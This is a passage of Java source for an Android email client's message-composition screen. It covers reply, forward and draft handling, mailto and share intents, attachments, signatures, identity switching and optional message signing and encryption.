static final int MSG_SAVED_DRAFT = 5; private static final int MSG_DISCARDED_DRAFT = 6; private static final int ACTIVITY_REQUEST_PICK_ATTACHMENT = 1; private static final int ACTIVITY_CHOOSE_IDENTITY = 2; private static final int ACTIVITY_CHOOSE_ACCOUNT = 3; /** * The account used for message composition. */ private Account mAccount; /** * This identity's settings are used for message composition. * Note: This has to be an identity of the account {@link #mAccount}. */ private Identity mIdentity; private boolean mIdentityChanged = false; private boolean mSignatureChanged = false; /** * Reference to the source message (in case of reply, forward, or edit * draft actions). */ private MessageReference mMessageReference; private Message mSourceMessage; private String mSourceMessageBody; /** * Indicates that the source message has been processed at least once and should not * be processed on any subsequent loads. This protects us from adding attachments that * have already been added from the restore of the view state. */ private boolean mSourceMessageProcessed = false; private TextView mFromView; private MultiAutoCompleteTextView mToView; private MultiAutoCompleteTextView mCcView; private MultiAutoCompleteTextView mBccView; private EditText mSubjectView; private EditText mSignatureView; private EditText mMessageContentView; private LinearLayout mAttachments; private View mQuotedTextBar; private ImageButton mQuotedTextDelete; private EditText mQuotedText; private View mEncryptLayout; private CheckBox mCryptoSignatureCheckbox; private CheckBox mEncryptCheckbox; private TextView mCryptoSignatureUserId; private TextView mCryptoSignatureUserIdRest; private CryptoProvider mCrypto = null; private String mReferences; private String mInReplyTo; private boolean mDraftNeedsSaving = false; private boolean mPreventDraftSaving = false; /** * The draft uid of this message. This is used when saving drafts so that the same draft is * overwritten instead of being created anew. This property is null until the first save. */ private String mDraftUid; private Handler mHandler = new Handler() { @Override public void handleMessage(android.os.Message msg) { switch (msg.what) { case MSG_PROGRESS_ON: setProgressBarIndeterminateVisibility(true); break; case MSG_PROGRESS_OFF: setProgressBarIndeterminateVisibility(false); break; case MSG_UPDATE_TITLE: updateTitle(); break; case MSG_SKIPPED_ATTACHMENTS: Toast.makeText( MessageCompose.this, getString(R.string.message_compose_attachments_skipped_toast), Toast.LENGTH_LONG).show(); break; case MSG_SAVED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_saved_toast), Toast.LENGTH_LONG).show(); break; case MSG_DISCARDED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_discarded_toast), Toast.LENGTH_LONG).show(); break; default: super.handleMessage(msg); break; } } }; private Listener mListener = new Listener(); private EmailAddressAdapter mAddressAdapter; private Validator mAddressValidator; class Attachment implements Serializable { public String name; public String contentType; public long size; public Uri uri; } /** * Compose a new message using the given account. If account is null the default account * will be used. * @param context * @param account */ public static void actionCompose(Context context, Account account) { if (account == null) { account = Preferences.getPreferences(context).getDefaultAccount(); } Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_ACCOUNT, account.getUuid()); context.startActivity(i); } /** * Compose a new message as a reply to the given message. If replyAll is true the function * is reply all instead of simply reply. * @param context * @param account * @param message * @param replyAll * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionReply( Context context, Account account, Message message, boolean replyAll, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); if (replyAll) { i.setAction(ACTION_REPLY_ALL); } else { i.setAction(ACTION_REPLY); } context.startActivity(i); } /** * Compose a new message as a forward of the given message. * @param context * @param account * @param message * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionForward( Context context, Account account, Message message, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_FORWARD); context.startActivity(i); } /** * Continue composition of the given message. This action modifies the way this Activity * handles certain actions. * Save will attempt to replace the message in the given folder with the updated version. * Discard will delete the message from the given folder. * @param context * @param account * @param folder * @param message */ public static void actionEditDraft(Context context, Account account, Message message) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_EDIT_DRAFT); context.startActivity(i); } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); setContentView(R.layout.message_compose); final Intent intent = getIntent(); mMessageReference = (MessageReference) intent.getSerializableExtra(EXTRA_MESSAGE_REFERENCE); mSourceMessageBody = (String) intent.getStringExtra(EXTRA_MESSAGE_BODY); final String accountUuid = (mMessageReference != null) ? mMessageReference.accountUuid : intent.getStringExtra(EXTRA_ACCOUNT); mAccount = Preferences.getPreferences(this).getAccount(accountUuid); if (mAccount == null) { mAccount = Preferences.getPreferences(this).getDefaultAccount(); } if (mAccount == null) { /* * There are no accounts set up. This should not have happened. Prompt the * user to set up an account as an acceptable bailout. */ startActivity(new Intent(this, Accounts.class)); mDraftNeedsSaving = false; finish(); return; } mAddressAdapter = EmailAddressAdapter.getInstance(this); mAddressValidator = new EmailAddressValidator(); mFromView = (TextView)findViewById(R.id.from); mToView = (MultiAutoCompleteTextView)findViewById(R.id.to); mCcView = (MultiAutoCompleteTextView)findViewById(R.id.cc); mBccView = (MultiAutoCompleteTextView)findViewById(R.id.bcc); mSubjectView = (EditText)findViewById(R.id.subject); EditText upperSignature = (EditText)findViewById(R.id.upper_signature); EditText lowerSignature = (EditText)findViewById(R.id.lower_signature); mMessageContentView = (EditText)findViewById(R.id.message_content); mAttachments = (LinearLayout)findViewById(R.id.attachments); mQuotedTextBar = findViewById(R.id.quoted_text_bar); mQuotedTextDelete = (ImageButton)findViewById(R.id.quoted_text_delete); mQuotedText = (EditText)findViewById(R.id.quoted_text); TextWatcher watcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; } public void afterTextChanged(android.text.Editable s) { } }; TextWatcher sigwatcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; mSignatureChanged = true; } public void afterTextChanged(android.text.Editable s) { } }; mToView.addTextChangedListener(watcher); mCcView.addTextChangedListener(watcher); mBccView.addTextChangedListener(watcher); mSubjectView.addTextChangedListener(watcher); mMessageContentView.addTextChangedListener(watcher); mQuotedText.addTextChangedListener(watcher); /* * We set this to invisible by default. Other methods will turn it back on if it's * needed. */ mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mQuotedTextDelete.setOnClickListener(this); mFromView.setVisibility(View.GONE); mToView.setAdapter(mAddressAdapter); mToView.setTokenizer(new Rfc822Tokenizer()); mToView.setValidator(mAddressValidator); mCcView.setAdapter(mAddressAdapter); mCcView.setTokenizer(new Rfc822Tokenizer()); mCcView.setValidator(mAddressValidator); mBccView.setAdapter(mAddressAdapter); mBccView.setTokenizer(new Rfc822Tokenizer()); mBccView.setValidator(mAddressValidator); mSubjectView.setOnFocusChangeListener(this); if (savedInstanceState != null) { /* * This data gets used in onCreate, so grab it here instead of onRestoreIntstanceState */ mSourceMessageProcessed = savedInstanceState.getBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, false); } String action = intent.getAction(); if (Intent.ACTION_VIEW.equals(action) || Intent.ACTION_SENDTO.equals(action)) { /* * Someone has clicked a mailto: link. The address is in the URI. */ if (intent.getData() != null) { Uri uri = intent.getData(); if ("mailto".equals(uri.getScheme())) { initializeFromMailTo(uri.toString()); } else { String toText = uri.getSchemeSpecificPart(); if (toText != null) { mToView.setText(toText); } } } } //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support else if (Intent.ACTION_SEND.equals(action) || Intent.ACTION_SENDTO.equals(action) || "android.intent.action.SEND_MULTIPLE".equals(action)) { /* * Someone is trying to compose an email with an attachment, probably Pictures. * The Intent should contain an EXTRA_STREAM with the data to attach. */ String text = intent.getStringExtra(Intent.EXTRA_TEXT); if (text != null) { mMessageContentView.setText(text); } String subject = intent.getStringExtra(Intent.EXTRA_SUBJECT); if (subject != null) { mSubjectView.setText(subject); } String type = intent.getType(); //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support if ("android.intent.action.SEND_MULTIPLE".equals(action)) { ArrayList<Parcelable> list = intent.getParcelableArrayListExtra(Intent.EXTRA_STREAM); if (list != null) { for (Parcelable parcelable : list) { Uri stream = (Uri) parcelable; if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } } } else { Uri stream = (Uri) intent.getParcelableExtra(Intent.EXTRA_STREAM); if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } /* * There might be an EXTRA_SUBJECT, EXTRA_TEXT, EXTRA_EMAIL, EXTRA_BCC or EXTRA_CC */ String extraSubject = intent.getStringExtra(Intent.EXTRA_SUBJECT); String extraText = intent.getStringExtra(Intent.EXTRA_TEXT); mSubjectView.setText(extraSubject); mMessageContentView.setText(extraText); String[] extraEmail = intent.getStringArrayExtra(Intent.EXTRA_EMAIL); String[] extraCc = intent.getStringArrayExtra(Intent.EXTRA_CC); String[] extraBcc = intent.getStringArrayExtra(Intent.EXTRA_BCC); String addressList; // Cache array size, as per Google's recommendations. int arraySize; int i; addressList = ""; if (extraEmail != null) { arraySize = extraEmail.length; for (i=0; i < arraySize; i++) { addressList += extraEmail[i]+", "; } } mToView.setText(addressList); addressList = ""; if (extraCc != null) { arraySize = extraCc.length; for (i=0; i < arraySize; i++) { addressList += extraCc[i]+", "; } } mCcView.setText(addressList); addressList = ""; if (extraBcc != null) { arraySize = extraBcc.length; for (i=0; i < arraySize; i++) { addressList += extraBcc[i]+", "; } } mBccView.setText(addressList); } if (mIdentity == null) { mIdentity = mAccount.getIdentity(0); } if (mAccount.isSignatureBeforeQuotedText()) { mSignatureView = upperSignature; lowerSignature.setVisibility(View.GONE); } else { mSignatureView = lowerSignature; upperSignature.setVisibility(View.GONE); } mSignatureView.addTextChangedListener(sigwatcher); if (!mIdentity.getSignatureUse()) { mSignatureView.setVisibility(View.GONE); } if (!mSourceMessageProcessed) { updateFrom(); updateSignature(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_FORWARD.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { /* * If we need to load the message we add ourself as a message listener here * so we can kick it off. Normally we add in onResume but we don't * want to reload the message every time the activity is resumed. * There is no harm in adding twice. */ MessagingController.getInstance(getApplication()).addListener(mListener); final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).loadMessageForView(account, folderName, sourceMessageUid, null); } if (!ACTION_EDIT_DRAFT.equals(action)) { String bccAddress = mAccount.getAlwaysBcc(); if ((bccAddress != null) && !("".equals(bccAddress))) { addAddress(mBccView, new Address(bccAddress, "")); } } /* if (K9.DEBUG) Log.d(K9.LOG_TAG, "action = " + action + ", account = " + mMessageReference.accountUuid + ", folder = " + mMessageReference.folderName + ", sourceMessageUid = " + mMessageReference.uid); */ if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Setting message ANSWERED flag to true"); // TODO: Really, we should wait until we send the message, but that would require saving the original // message info along with a Draft copy, in case it is left in Drafts for a while before being sent final Account account = Preferences.getPreferences(this).getAccount(mMessageReference.accountUuid); final String folderName = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; MessagingController.getInstance(getApplication()).setFlag(account, folderName, new String[] { sourceMessageUid }, Flag.ANSWERED, true); } updateTitle(); } if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action) || ACTION_EDIT_DRAFT.equals(action)) { //change focus to message body. mMessageContentView.requestFocus(); } mEncryptLayout = (View)findViewById(R.id.layout_encrypt); mCryptoSignatureCheckbox = (CheckBox)findViewById(R.id.cb_crypto_signature); mCryptoSignatureUserId = (TextView)findViewById(R.id.userId); mCryptoSignatureUserIdRest = (TextView)findViewById(R.id.userIdRest); mEncryptCheckbox = (CheckBox)findViewById(R.id.cb_encrypt); initializeCrypto(); if (mCrypto.isAvailable(this)) { mEncryptLayout.setVisibility(View.VISIBLE); mCryptoSignatureCheckbox.setOnClickListener(new OnClickListener() { @Override public void onClick(View v) { CheckBox checkBox = (CheckBox) v; if (checkBox.isChecked()) { mPreventDraftSaving = true; if (!mCrypto.selectSecretKey(MessageCompose.this)) { mPreventDraftSaving = false; } checkBox.setChecked(false); } else { mCrypto.setSignatureKeyId(0); updateEncryptLayout(); } } }); if (mAccount.getCryptoAutoSignature()) { long ids[] = mCrypto.getSecretKeyIdsFromEmail(this, mIdentity.getEmail()); if (ids != null && ids.length > 0) { mCrypto.setSignatureKeyId(ids[0]); mCrypto.setSignatureUserId(mCrypto.getUserId(this, ids[0])); } else { mCrypto.setSignatureKeyId(0); mCrypto.setSignatureUserId(null); } } updateEncryptLayout(); } else { mEncryptLayout.setVisibility(View.GONE); } mDraftNeedsSaving = false; } private void initializeCrypto() { if (mCrypto != null) { return; } mCrypto = CryptoProvider.createInstance(mAccount); } /** * Fill the encrypt layout with the latest data about signature key and encryption keys. */ public void updateEncryptLayout() { if (!mCrypto.hasSignatureKey()) { mCryptoSignatureCheckbox.setText(R.string.btn_crypto_sign); mCryptoSignatureCheckbox.setChecked(false); mCryptoSignatureUserId.setVisibility(View.INVISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.INVISIBLE); } else { // if a signature key is selected, then the checkbox itself has no text mCryptoSignatureCheckbox.setText(""); mCryptoSignatureCheckbox.setChecked(true); mCryptoSignatureUserId.setVisibility(View.VISIBLE); mCryptoSignatureUserIdRest.setVisibility(View.VISIBLE); mCryptoSignatureUserId.setText(R.string.unknown_crypto_signature_user_id); mCryptoSignatureUserIdRest.setText(""); String userId = mCrypto.getSignatureUserId(); if (userId == null) { userId = mCrypto.getUserId(this, mCrypto.getSignatureKeyId()); mCrypto.setSignatureUserId(userId); } if (userId != null) { String chunks[] = mCrypto.getSignatureUserId().split(" <", 2); mCryptoSignatureUserId.setText(chunks[0]); if (chunks.length > 1) { mCryptoSignatureUserIdRest.setText("<" + chunks[1]); } } } } @Override public void onResume() { super.onResume(); MessagingController.getInstance(getApplication()).addListener(mListener); } @Override public void onPause() { super.onPause(); saveIfNeeded(); MessagingController.getInstance(getApplication()).removeListener(mListener); } /** * The framework handles most of the fields, but we need to handle stuff that we * dynamically show and hide: * Attachment list, * Cc field, * Bcc field, * Quoted text, */ @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); saveIfNeeded(); ArrayList<Uri> attachments = new ArrayList<Uri>(); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { View view = mAttachments.getChildAt(i); Attachment attachment = (Attachment) view.getTag(); attachments.add(attachment.uri); } outState.putParcelableArrayList(STATE_KEY_ATTACHMENTS, attachments); outState.putBoolean(STATE_KEY_CC_SHOWN, mCcView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_BCC_SHOWN, mBccView.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_QUOTED_TEXT_SHOWN, mQuotedTextBar.getVisibility() == View.VISIBLE); outState.putBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, mSourceMessageProcessed); outState.putString(STATE_KEY_DRAFT_UID, mDraftUid); outState.putSerializable(STATE_IDENTITY, mIdentity); outState.putBoolean(STATE_IDENTITY_CHANGED, mIdentityChanged); outState.putSerializable(STATE_CRYPTO, mCrypto); outState.putString(STATE_IN_REPLY_TO, mInReplyTo); outState.putString(STATE_REFERENCES, mReferences); } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); ArrayList<Parcelable> attachments = (ArrayList<Parcelable>) savedInstanceState.getParcelableArrayList(STATE_KEY_ATTACHMENTS); mAttachments.removeAllViews(); for (Parcelable p : attachments) { Uri uri = (Uri) p; addAttachment(uri); } mCcView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_CC_SHOWN) ? View.VISIBLE : View.GONE); mBccView.setVisibility(savedInstanceState.getBoolean(STATE_KEY_BCC_SHOWN) ? View.VISIBLE : View.GONE); mQuotedTextBar.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mQuotedText.setVisibility(savedInstanceState.getBoolean(STATE_KEY_QUOTED_TEXT_SHOWN) ? View.VISIBLE : View.GONE); mDraftUid = savedInstanceState.getString(STATE_KEY_DRAFT_UID); mIdentity = (Identity)savedInstanceState.getSerializable(STATE_IDENTITY); mIdentityChanged = savedInstanceState.getBoolean(STATE_IDENTITY_CHANGED); mCrypto = (CryptoProvider) savedInstanceState.getSerializable(STATE_CRYPTO); mInReplyTo = savedInstanceState.getString(STATE_IN_REPLY_TO); mReferences = savedInstanceState.getString(STATE_REFERENCES); initializeCrypto(); updateFrom(); updateSignature(); updateEncryptLayout(); mDraftNeedsSaving = false; } private void updateTitle() { if (mSubjectView.getText().length() == 0) { setTitle(R.string.compose_title); } else { setTitle(mSubjectView.getText().toString()); } } public void onFocusChange(View view, boolean focused) { if (!focused) { updateTitle(); } } private void addAddresses(MultiAutoCompleteTextView view, Address[] addresses) { if (addresses == null) { return; } for (Address address : addresses) { addAddress(view, address); } } private void addAddress(MultiAutoCompleteTextView view, Address address) { view.append(address + ", "); } private Address[] getAddresses(MultiAutoCompleteTextView view) { Address[] addresses = Address.parseUnencoded(view.getText().toString().trim()); return addresses; } private String buildText(boolean appendSig) { /* * Build the Body that will contain the text of the message. We'll decide where to * include it later. */ String text = mMessageContentView.getText().toString(); if (appendSig && mAccount.isSignatureBeforeQuotedText()) { text = appendSignature(text); } if (mQuotedTextBar.getVisibility() == View.VISIBLE) { text += "\n" + mQuotedText.getText().toString(); } if (appendSig && mAccount.isSignatureBeforeQuotedText() == false) { text = appendSignature(text); } return text; } private MimeMessage createMessage(boolean appendSig) throws MessagingException { MimeMessage message = new MimeMessage(); message.addSentDate(new Date()); Address from = new Address(mIdentity.getEmail(), mIdentity.getName()); message.setFrom(from); message.setRecipients(RecipientType.TO, getAddresses(mToView)); message.setRecipients(RecipientType.CC, getAddresses(mCcView)); message.setRecipients(RecipientType.BCC, getAddresses(mBccView)); message.setSubject(mSubjectView.getText().toString()); message.setHeader("X-User-Agent", getString(R.string.message_header_mua)); final String replyTo = mIdentity.getReplyTo(); if (replyTo != null) { message.setReplyTo(new Address[] { new Address(replyTo) }); } if (mInReplyTo != null) { message.setInReplyTo(mInReplyTo); } if (mReferences != null) { message.setReferences(mReferences); } String text = null; if (mCrypto.getEncryptedData() != null) { text = mCrypto.getEncryptedData(); } else { text = buildText(appendSig); } TextBody body = new TextBody(text); if (mAttachments.getChildCount() > 0) { /* * The message has attachments that need to be included. First we add the part * containing the text that will be sent and then we include each attachment. */ MimeMultipart mp; mp = new MimeMultipart(); mp.addBodyPart(new MimeBodyPart(body, "text/plain")); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { Attachment attachment = (Attachment) mAttachments.getChildAt(i).getTag(); MimeBodyPart bp = new MimeBodyPart( new LocalStore.LocalAttachmentBody(attachment.uri, getApplication())); /* * Correctly encode the filename here. Otherwise the whole * header value (all parameters at once) will be encoded by * MimeHeader.writeTo(). */ bp.addHeader(MimeHeader.HEADER_CONTENT_TYPE, String.format("%s;\n name=\"%s\"", attachment.contentType, EncoderUtil.encodeIfNecessary(attachment.name, EncoderUtil.Usage.WORD_ENTITY, 7))); bp.addHeader(MimeHeader.HEADER_CONTENT_TRANSFER_ENCODING, "base64"); /* * TODO: Oh the joys of MIME... * * From RFC 2183 (The Content-Disposition Header Field): * "Parameter values longer than 78 characters, or which * contain non-ASCII characters, MUST be encoded as specified * in [RFC 2184]." * * Example: * * Content-Type: application/x-stuff * title*1*=us-ascii'en'This%20is%20even%20more%20 * title*2*=%2A%2A%2Afun%2A%2A%2A%20 * title*3="isn't it!" */ bp.addHeader(MimeHeader.HEADER_CONTENT_DISPOSITION, String.format( "attachment;\n filename=\"%s\";\n size=%d", attachment.name, attachment.size)); mp.addBodyPart(bp); } message.setBody(mp); } else { /* * No attachments to include, just stick the text body in the message and call * it good. */ message.setBody(body); } return message; } private String appendSignature(String text) { if (mIdentity.getSignatureUse()) { String signature = mSignatureView.getText().toString(); if (signature != null && !signature.contentEquals("")) { text += "\n" + signature; } } return text; } private void sendMessage() { new SendMessageTask().execute(); } private void saveMessage() { new SaveMessageTask().execute(); } private void saveIfNeeded() { if (!mDraftNeedsSaving || mPreventDraftSaving || mCrypto.hasEncryptionKeys()) { return; } mDraftNeedsSaving = false; saveMessage(); } public void onEncryptionKeySelectionDone() { if (mCrypto.hasEncryptionKeys()) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } public void onEncryptDone() { if (mCrypto.getEncryptedData() != null) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } private void onSend() { if (getAddresses(mToView).length == 0 && getAddresses(mCcView).length == 0 && getAddresses(mBccView).length == 0) { mToView.setError(getString(R.string.message_compose_error_no_recipients)); Toast.makeText(this, getString(R.string.message_compose_error_no_recipients), Toast.LENGTH_LONG).show(); return; } if (mEncryptCheckbox.isChecked() && !mCrypto.hasEncryptionKeys()) { // key selection before encryption String emails = ""; Address[][] addresses = new Address[][] { getAddresses(mToView), getAddresses(mCcView), getAddresses(mBccView) }; for (Address[] addressArray : addresses) { for (Address address : addressArray) { if (emails.length() != 0) { emails += ","; } emails += address.getAddress(); } } if (emails.length() != 0) { emails += ","; } emails += mIdentity.getEmail(); mPreventDraftSaving = true; if (!mCrypto.selectEncryptionKeys(MessageCompose.this, emails)) { mPreventDraftSaving = false; } return; } if (mCrypto.hasEncryptionKeys() || mCrypto.hasSignatureKey()) { if (mCrypto.getEncryptedData() == null) { String text = buildText(true); mPreventDraftSaving = true; if (!mCrypto.encrypt(this, text)) { mPreventDraftSaving = false; } return; } } sendMessage(); mDraftNeedsSaving = false; finish(); } private void onDiscard() { if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } mHandler.sendEmptyMessage(MSG_DISCARDED_DRAFT); mDraftNeedsSaving = false; finish(); } private void onSave() { mDraftNeedsSaving = true; saveIfNeeded(); finish(); } private void onAddCcBcc() { mCcView.setVisibility(View.VISIBLE); mBccView.setVisibility(View.VISIBLE); } /** * Kick off a picker for whatever kind of MIME types we'll accept and let Android take over. */ private void onAddAttachment() { if (K9.isGalleryBuggy()) { if (K9.useGalleryBugWorkaround()) { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_use_workaround), Toast.LENGTH_LONG).show(); } else { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_buggy_gallery), Toast.LENGTH_LONG).show(); } } onAddAttachment2(K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES[0]); } /** * Kick off a picker for the specified MIME type and let Android take over. */ private void onAddAttachment2(final String mime_type) { if (mCrypto.isAvailable(this)) { Toast.makeText(this, R.string.attachment_encryption_unsupported, Toast.LENGTH_LONG).show(); } Intent i = new Intent(Intent.ACTION_GET_CONTENT); i.addCategory(Intent.CATEGORY_OPENABLE); i.setType(mime_type); startActivityForResult(Intent.createChooser(i, null), ACTIVITY_REQUEST_PICK_ATTACHMENT); } private void addAttachment(Uri uri) { addAttachment(uri, -1, null); } private void addAttachment(Uri uri, int size, String name) { ContentResolver contentResolver = getContentResolver(); Attachment attachment = new Attachment(); attachment.name = name; attachment.size = size; attachment.uri = uri; if (attachment.size == -1 || attachment.name == null) { Cursor metadataCursor = contentResolver.query(uri, new String[] { OpenableColumns.DISPLAY_NAME, OpenableColumns.SIZE }, null, null, null); if (metadataCursor != null) { try { if (metadataCursor.moveToFirst()) { if (attachment.name == null) { attachment.name = metadataCursor.getString(0); } if (attachment.size == -1) { attachment.size = metadataCursor.getInt(1); Log.v(K9.LOG_TAG, "size: " + attachment.size); } } } finally { metadataCursor.close(); } } } if (attachment.name == null) { attachment.name = uri.getLastPathSegment(); } String contentType = contentResolver.getType(uri); if (contentType == null) { contentType = MimeUtility.getMimeTypeByExtension(attachment.name); } attachment.contentType = contentType; if (attachment.size<=0) { String uriString = uri.toString(); if (uriString.startsWith("file://")) { Log.v(K9.LOG_TAG, uriString.substring("file://".length())); File f = new File(uriString.substring("file://".length())); attachment.size = f.length(); } else { Log.v(K9.LOG_TAG, "Not a file: " + uriString); } } else { Log.v(K9.LOG_TAG, "old attachment.size: " + attachment.size); } Log.v(K9.LOG_TAG, "new attachment.size: " + attachment.size); View view = getLayoutInflater().inflate(R.layout.message_compose_attachment, mAttachments, false); TextView nameView = (TextView)view.findViewById(R.id.attachment_name); ImageButton delete = (ImageButton)view.findViewById(R.id.attachment_delete); nameView.setText(attachment.name); delete.setOnClickListener(this); delete.setTag(view); view.setTag(attachment); mAttachments.addView(view); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { // if a CryptoSystem activity is returning, then mPreventDraftSaving was set to true mPreventDraftSaving = false; if (mCrypto.onActivityResult(this, requestCode, resultCode, data)) { return; } if (resultCode != RESULT_OK) return; if (data == null) { return; } switch (requestCode) { case ACTIVITY_REQUEST_PICK_ATTACHMENT: addAttachment(data.getData()); mDraftNeedsSaving = true; break; case ACTIVITY_CHOOSE_IDENTITY: onIdentityChosen(data); break; case ACTIVITY_CHOOSE_ACCOUNT: onAccountChosen(data); break; } } private void onAccountChosen(final Intent intent) { final Bundle extras = intent.getExtras(); final String uuid = extras.getString(ChooseAccount.EXTRA_ACCOUNT); final Identity identity = (Identity) extras.getSerializable(ChooseAccount.EXTRA_IDENTITY); final Account account = Preferences.getPreferences(this).getAccount(uuid); if (!mAccount.equals(account)) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Switching account from " + mAccount + " to " + account); } // on draft edit, make sure we don't keep previous message UID if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { mMessageReference = null; } // test whether there is something to save if (mDraftNeedsSaving || (mDraftUid != null)) { final String previousDraftUid = mDraftUid; final Account previousAccount = mAccount; // make current message appear as new mDraftUid = null; // actual account switch mAccount = account; if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, saving new draft in new account"); } saveMessage(); if (previousDraftUid != null) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, deleting draft from previous account: " + previousDraftUid); } MessagingController.getInstance(getApplication()).deleteDraft(previousAccount, previousDraftUid); } } else { mAccount = account; } // not sure how to handle mFolder, mSourceMessage? } switchToIdentity(identity); } private void onIdentityChosen(Intent intent) { Bundle bundle = intent.getExtras();; switchToIdentity((Identity)bundle.getSerializable(ChooseIdentity.EXTRA_IDENTITY)); } private void switchToIdentity(Identity identity) { mIdentity = identity; mIdentityChanged = true; mDraftNeedsSaving = true; updateFrom(); updateSignature(); } private void updateFrom() { if (mIdentityChanged) { mFromView.setVisibility(View.VISIBLE); } mFromView.setText(getString(R.string.message_view_from_format, mIdentity.getName(), mIdentity.getEmail())); } private void updateSignature() { if (mIdentity.getSignatureUse()) { mSignatureView.setText(mIdentity.getSignature()); mSignatureView.setVisibility(View.VISIBLE); } else { mSignatureView.setVisibility(View.GONE); } } public void onClick(View view) { switch (view.getId()) { case R.id.attachment_delete: /* * The view is the delete button, and we have previously set the tag of * the delete button to the view that owns it. We don't use parent because the * view is very complex and could change in the future. */ mAttachments.removeView((View) view.getTag()); mDraftNeedsSaving = true; break; case R.id.quoted_text_delete: mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mDraftNeedsSaving = true; break; } } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case R.id.send: mCrypto.setEncryptionKeys(null); onSend(); break; case R.id.save: onSave(); break; case R.id.discard: onDiscard(); break; case R.id.add_cc_bcc: onAddCcBcc(); break; case R.id.add_attachment: onAddAttachment(); break; case R.id.add_attachment_image: onAddAttachment2("image/*"); break; case R.id.add_attachment_video: onAddAttachment2("video/*"); break; case R.id.choose_identity: onChooseIdentity(); break; default: return super.onOptionsItemSelected(item); } return true; } private void onChooseIdentity() { // keep things simple: trigger account choice only if there are more // than 1 account if (Preferences.getPreferences(this).getAccounts().length > 1) { final Intent intent = new Intent(this, ChooseAccount.class); intent.putExtra(ChooseAccount.EXTRA_ACCOUNT, mAccount.getUuid()); intent.putExtra(ChooseAccount.EXTRA_IDENTITY, mIdentity); startActivityForResult(intent, ACTIVITY_CHOOSE_ACCOUNT); } else if (mAccount.getIdentities().size() > 1) { Intent intent = new Intent(this, ChooseIdentity.class); intent.putExtra(ChooseIdentity.EXTRA_ACCOUNT, mAccount.getUuid()); startActivityForResult(intent, ACTIVITY_CHOOSE_IDENTITY); } else { Toast.makeText(this, getString(R.string.no_identities), Toast.LENGTH_LONG).show(); } } @Override public boolean onCreateOptionsMenu(Menu menu) { super.onCreateOptionsMenu(menu); getMenuInflater().inflate(R.menu.message_compose_option, menu); /* * Show the menu items "Add attachment (Image)" and "Add attachment (Video)" * if the work-around for the Gallery bug is enabled (see Issue 1186). */ int found = 0; for (int i = menu.size() - 1; i >= 0; i--) { MenuItem item = menu.getItem(i); int id = item.getItemId(); if ((id == R.id.add_attachment_image) || (id == R.id.add_attachment_video)) { item.setVisible(K9.useGalleryBugWorkaround()); found++; } // We found all the menu items we were looking for. So stop here. if (found == 2) break; } return true; } public void onBackPressed() { // This will be called either automatically for you on 2.0 // or later, or by the code above on earlier 